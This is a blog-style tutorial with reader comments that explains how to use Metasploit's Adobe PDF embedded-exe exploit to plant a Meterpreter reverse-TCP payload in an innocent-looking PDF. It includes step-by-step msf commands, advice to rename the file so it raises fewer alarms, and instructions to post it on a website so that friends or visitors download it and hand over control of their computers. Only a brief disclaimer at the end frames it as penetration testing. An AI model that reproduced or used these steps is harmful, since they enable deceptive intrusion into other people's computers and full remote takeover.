How To Hack: Embed a Backdoor Connection in an Innocent-Looking PDF

While web servers, database servers, and file servers have garnered increased protection, the client-side remains extremely vulnerable, and there is much to teach. This time, we’ll look at inserting a listener (rootkit) inside a PDF file, exploiting a vulnerability in Adobe’s Reader. Anyone who read my earlier tutorial on how to get a listener implemented through Microsoft Word using an rtf file may look at this How-To and find it very similar! Some of the same basic steps…

The Problem

Adobe has had numerous security issues with their products, including Adobe Reader, Illustrator, Flash, and others. Security vulnerabilities are partly responsible for Apple forbidding Flash from their iOS. Adobe continues to be behind the curve in security, and as a result, millions of client-side systems are vulnerable.

Among the most widely used Adobe products is Reader.

Nearly every computer has some version of Adobe Reader on it for reading PDFs. You probably have it, too. But, most people are unaware of the security issues that Reader has experienced—and they fail to upgrade or patch it.

According to the antivirus software maker Avast, over 60 percent of computers have Adobe Reader 9 or earlier installed, even though the newest version is 11. So, today we will exploit those computers with Adobe Reader 9 or earlier.

The Exploit

In this exploit, we will alter an existing .pdf file that can then be posted to our website. When friends or others download it, it will open a listener (a rootkit) on their system and give us total control of their computer remotely.

Let’s start by firing up Metasploit. If you haven’t updated your Metasploit yet, this would be a good time to do it. Simply type msfupdate at the msf prompt.

Step 1: Find the Appropriate Exploit

First, let’s find the appropriate exploit by searching Metasploit for one that will use this version of Adobe Reader:

msf > search type:exploit platform:windows adobe pdf

In the screenshot above we can see that Metasploit listed all the exploits that met our criteria. Let’s use the “exploit/windows/fileformat/adobe_pdf_embedded_exe“.

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 2: Gather Info on This Exploit

Now let’s take a look at the information available to us about this exploit:

msf > exploit (adobe_pdf_embedded_exe) > info

Note that in the description, Metasploit tells us that it embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. In addition to sending to the victim, one can also embed it into a website inviting the unsuspecting victim to download it.

Step 3: Set Our Payload

In our next step, we need to set our payload to embed into the PDF. Type:

msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Step 4: Set Options

Now that we chosen our exploit and set our payload, the only thing left to do is to set our options. Let’s take a look at the options for this exploit and payload by typing:

msf > exploit (adobe_pdf_embedded_exe) > show options

As you can see from the screenshot above, Metasploit requires us to provide an existing PDF where it can embed the Meterpreter.

Let’s set a file named chapter1.pdf, presumably some class notes (make certain that this file was created with Reader 9 or earlier), to our INFILENAME option.

msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME cahpter1.pdf

Then change the default FILENAME of the output file with the embedded Meterpreter to same innocuous sounding chapter1.pdf. The default name is evil.pdf, but is likely to set off too many alarms.

msf > exploit (adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf

Then, set the LHOST (our system) to our IP address or

msf > exploit (adobe_pdf_embedded_exe) > set LHOST

Step 5: Double Check the Settings

Now, let’s check our options again to see whether everything is ready to go.

msf > exploit (adobe_pdf_embedded_exe) > show options

Step 6: Exploit!

As you can see from the screenshot above, all our options are set all we need to do now exploit.

msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit has created a PDF named chapter1.pdf that contains the Meterpeter listener. Metasploit has placed this file at /root/.msf4/local/chapter1.pdf.

Simply copy this file to your website and invite visitors to download it. When our victim downloads and opens this file from your website, it will open a connection to your system that you can use to run and own their computer system.

Of course, this information should be used in controlled environments and for legal Penetration Testing and Educational Purposes. Never use this information for bad stuff and always do it with permission of the Target PC, Business, or Network Owner

Tagged , , , , , , , , , , , . Bookmark the permalink.

3 Responses to How To Hack: Embed a Backdoor Connection in an Innocent-Looking PDF

  1. Storm says:

    where should i put the pdf and can i use my own ip address

  2. Storm says:

    ps using community not on backtrack

  3. Mads says:

    Why does it says!
    Exploit failed: The following options failed to validate: INFILENAME.

Leave a Reply

Your email address will not be published. Required fields are marked *